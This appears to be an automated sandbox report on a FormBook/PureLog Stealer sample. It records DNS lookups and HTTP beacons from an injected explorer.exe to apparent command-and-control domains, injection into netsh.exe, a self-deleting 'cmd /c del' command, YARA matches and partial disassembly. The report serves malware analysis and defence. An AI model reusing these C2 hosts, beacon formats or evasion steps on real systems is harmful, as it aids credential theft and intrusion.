                                                  Jul 3, 2024 14:51:27.316390991 CEST192.168.2.51.1.1.10xfa4dStandard query (0)www.j0mui3.shopA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:51:47.752373934 CEST192.168.2.51.1.1.10xe02fStandard query (0)www.cgffwelcome.comA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:08.236404896 CEST192.168.2.51.1.1.10x80a9Standard query (0)www.dehamobilya.comA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:28.785418034 CEST192.168.2.51.1.1.10x3f59Standard query (0)www.happyjumps.coA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:49.220643044 CEST192.168.2.51.1.1.10x15e7Standard query (0)www.tires-book-robust.bondA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:09.657294989 CEST192.168.2.51.1.1.10x5b0fStandard query (0)www.foton.africaA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:30.235338926 CEST192.168.2.51.1.1.10x5f99Standard query (0)www.e2olyiab.shopA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:50.813308954 CEST192.168.2.51.1.1.10x1849Standard query (0)www.yipicircle.lifeA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:54:13.047549009 CEST192.168.2.51.1.1.10x723dStandard query (0)www.tempotrekstore.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 3, 2024 14:50:26.083115101 CEST1.1.1.1192.168.2.50xe5f5Name error (3)www.theburnscleanteam.comnonenoneA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:50:47.680409908 CEST1.1.1.1192.168.2.50xb1d5No error (0)www.tiensbangladesh.net162.244.93.3A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:51:07.051964998 CEST1.1.1.1192.168.2.50x7108No error (0)www.shopusuniform.com199.59.243.226A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:51:27.790054083 CEST1.1.1.1192.168.2.50xfa4dNo error (0)www.j0mui3.shopld2.gd788.ccCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:51:27.790054083 CEST1.1.1.1192.168.2.50xfa4dNo error (0)ld2.gd788.cc42ty3zme.vakcloud.comCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:51:27.790054083 CEST1.1.1.1192.168.2.50xfa4dNo error (0)42ty3zme.vakcloud.compa94nj5r.vakcloud.comCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:51:27.790054083 CEST1.1.1.1192.168.2.50xfa4dNo error (0)pa94nj5r.vakcloud.com14.128.41.165A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:51:48.121083021 CEST1.1.1.1192.168.2.50xe02fName error (3)www.cgffwelcome.comnonenoneA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:08.276448965 CEST1.1.1.1192.168.2.50x80a9No error (0)www.dehamobilya.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:52:08.276448965 CEST1.1.1.1192.168.2.50x80a9No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:52:08.276448965 CEST1.1.1.1192.168.2.50x80a9No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:28.798777103 CEST1.1.1.1192.168.2.50x3f59No error (0)www.happyjumps.cohappyjumps.coCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:52:28.798777103 CEST1.1.1.1192.168.2.50x3f59No error (0)happyjumps.co3.33.130.190A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:28.798777103 CEST1.1.1.1192.168.2.50x3f59No error (0)happyjumps.co15.197.148.33A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:52:49.432316065 CEST1.1.1.1192.168.2.50x15e7Name error (3)www.tires-book-robust.bondnonenoneA (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:09.922772884 CEST1.1.1.1192.168.2.50x5b0fNo error (0)www.foton.africa52.60.87.163A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:30.412910938 CEST1.1.1.1192.168.2.50x5f99No error (0)www.e2olyiab.shopgoogleyou.qqdns.shopCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:53:30.412910938 CEST1.1.1.1192.168.2.50x5f99No error (0)googleyou.qqdns.shop34.92.194.225A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:50.840811014 CEST1.1.1.1192.168.2.50x1849No error (0)www.yipicircle.lifeyipicircle.lifeCNAME (Canonical name)IN (0x0001)false
                                                  Jul 3, 2024 14:53:50.840811014 CEST1.1.1.1192.168.2.50x1849No error (0)yipicircle.life3.33.130.190A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:53:50.840811014 CEST1.1.1.1192.168.2.50x1849No error (0)yipicircle.life15.197.148.33A (IP address)IN (0x0001)false
                                                  Jul 3, 2024 14:54:13.308358908 CEST1.1.1.1192.168.2.50x723dName error (3)www.tempotrekstore.comnonenoneA (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.tiensbangladesh.net
                                                  • www.shopusuniform.com
                                                  • www.j0mui3.shop
                                                  • www.dehamobilya.com
                                                  • www.happyjumps.co
                                                  • www.yipicircle.life

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549719162.244.93.3801028C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 3, 2024 14:50:47.686111927 CEST164OUTGET /cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb HTTP/1.1
                                                  Host: www.tiensbangladesh.net
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.549720199.59.243.226801028C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 3, 2024 14:51:07.057745934 CEST162OUTGET /cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb HTTP/1.1
                                                  Host: www.shopusuniform.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:51:07.511368990 CEST1236INHTTP/1.1 200 OK
                                                  date: Wed, 03 Jul 2024 12:51:07 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1314
                                                  x-request-id: a7dbd7e3-08e1-45a4-9f1a-468ffa22a0f1
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bDF4T2ogfaqYQMyW24dKb1cgsqIAvwCajuS0QdCJb/xA/Zkf3SeormFsNLYBV16iQGpPaXnqpcIolCJo5As21A==
                                                  set-cookie: parking_session=a7dbd7e3-08e1-45a4-9f1a-468ffa22a0f1; expires=Wed, 03 Jul 2024 13:06:07 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 44 46 34 54 32 6f 67 66 61 71 59 51 4d 79 57 32 34 64 4b 62 31 63 67 73 71 49 41 76 77 43 61 6a 75 53 30 51 64 43 4a 62 2f 78 41 2f 5a 6b 66 33 53 65 6f 72 6d 46 73 4e 4c 59 42 56 31 36 69 51 47 70 50 61 58 6e 71 70 63 49 6f 6c 43 4a 6f 35 41 73 32 31 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bDF4T2ogfaqYQMyW24dKb1cgsqIAvwCajuS0QdCJb/xA/Zkf3SeormFsNLYBV16iQGpPaXnqpcIolCJo5As21A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Jul 3, 2024 14:51:07.511396885 CEST767INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTdkYmQ3ZTMtMDhlMS00NWE0LTlmMWEtNDY4ZmZhMjJhMGYxIiwicGFnZV90aW1lIjoxNzIwMDExMD


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.54972114.128.41.165801028C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 3, 2024 14:51:27.802912951 CEST156OUTGET /cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb HTTP/1.1
                                                  Host: www.j0mui3.shop
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.54972234.149.87.45801028C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 3, 2024 14:52:08.288537979 CEST160OUTGET /cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb HTTP/1.1
                                                  Host: www.dehamobilya.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:52:08.758635044 CEST475INHTTP/1.1 301 Moved Permanently
                                                  Content-Length: 0
                                                  Location: https://www.dehamobilya.com/cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb
                                                  Accept-Ranges: bytes
                                                  Date: Wed, 03 Jul 2024 12:52:08 GMT
                                                  X-Served-By: cache-iad-kcgs7200105-IAD
                                                  X-Cache: MISS
                                                  X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=
                                                  Via: 1.1 google
                                                  glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.5497233.33.130.190801028C:\Windows\explorer.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 3, 2024 14:52:28.804977894 CEST158OUTGET /cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb HTTP/1.1
                                                  Host: www.happyjumps.co
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:52:29.270483971 CEST338INHTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Wed, 03 Jul 2024 12:52:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 198
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 34 31 30 56 3d 70 62 53 62 6e 31 72 4d 69 71 31 4f 50 54 50 36 49 43 64 6e 76 66 57 70 68 61 68 67 39 2b 33 47 74 35 75 6f 51 77 37 36 68 41 36 64 36 54 31 47 4a 2b 65 4b 67 2b 51 37 58 4f 6e 6a 57 78 6e 6c 6f 6c 35 33 26 4b 72 3d 59 74 78 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb"}</script></head></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5192.168.2.5497263.33.130.19080
                                                  TimestampBytes transferredDirectionData
                                                  Jul 3, 2024 14:53:50.846445084 CEST160OUTGET /cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb HTTP/1.1
                                                  Host: www.yipicircle.life
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Jul 3, 2024 14:53:51.307919025 CEST338INHTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Wed, 03 Jul 2024 12:53:51 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 198
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 34 31 30 56 3d 68 4d 36 64 71 74 30 62 4e 52 4a 33 77 6e 71 6f 68 58 45 63 6b 47 2b 72 61 37 42 70 79 43 46 4e 4e 31 79 43 6a 6a 59 43 31 59 45 46 41 6f 68 69 62 45 49 79 66 52 58 68 68 42 33 66 6d 4c 2f 4a 74 47 53 6a 26 4b 72 3d 59 74 78 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb"}</script></head></html>


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:49:48
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0xb00000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2005358517.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2007353143.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2005886630.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2007470548.0000000007140000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2005358517.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x10000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x170000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x40000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Users\user\Desktop\hOe2JrpIAE.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x620000
                                                  File size:674'824 bytes
                                                  MD5 hash:21A8497522DE5B8B12067FCA910E0469
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:08:49:50
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff674740000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.4452293523.000000000E4F2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:08:49:51
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                  Imagebase:0x1080000
                                                  File size:82'432 bytes
                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:9
                                                  Start time:08:49:55
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:08:49:55
                                                  Start date:03/07/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:4.8%
                                                    Total number of Nodes:228
                                                    Total number of Limit Nodes:18
                                                    execution_graph 46512 5022c30 FindCloseChangeNotification 46513 5022c97 46512->46513 46404 119d01c 46405 119d034 46404->46405 46406 119d08e 46405->46406 46411 2f71aec 46405->46411 46420 2f72858 46405->46420 46424 2f72868 46405->46424 46428 2f735c8 46405->46428 46412 2f71af7 46411->46412 46413 2f73639 46412->46413 46415 2f73629 46412->46415 46453 2f71c14 46413->46453 46437 2f73760 46415->46437 46442 2f73750 46415->46442 46447 2f7382c 46415->46447 46416 2f73637 46421 2f7288e 46420->46421 46422 2f71aec CallWindowProcW 46421->46422 46423 2f728af 46422->46423 46423->46406 46425 2f7288e 46424->46425 46426 2f71aec CallWindowProcW 46425->46426 46427 2f728af 46426->46427 46427->46406 46431 2f73605 46428->46431 46429 2f73639 46430 2f71c14 CallWindowProcW 46429->46430 46433 2f73637 46430->46433 46431->46429 46432 2f73629 46431->46432 46434 2f73760 CallWindowProcW 46432->46434 46435 2f73750 CallWindowProcW 46432->46435 46436 2f7382c CallWindowProcW 46432->46436 46434->46433 46435->46433 46436->46433 46439 2f73774 46437->46439 46438 2f73800 46438->46416 46457 2f73807 46439->46457 46462 2f73818 46439->46462 46444 2f7375f 46442->46444 46443 2f73800 46443->46416 46445 2f73807 CallWindowProcW 46444->46445 46446 2f73818 CallWindowProcW 46444->46446 46445->46443 46446->46443 46448 2f737ea 46447->46448 46449 2f7383a 46447->46449 46451 2f73807 CallWindowProcW 46448->46451 46452 2f73818 CallWindowProcW 46448->46452 46450 2f73800 46450->46416 46451->46450 46452->46450 46454 2f71c1f 46453->46454 46455 2f74d1a CallWindowProcW 46454->46455 46456 2f74cc9 46454->46456 46455->46456 46456->46416 46458 2f73812 46457->46458 46459 2f7387f 46457->46459 46461 2f73829 46458->46461 46465 2f74c3e 46458->46465 46461->46438 46463 2f73829 46462->46463 46464 2f74c3e CallWindowProcW 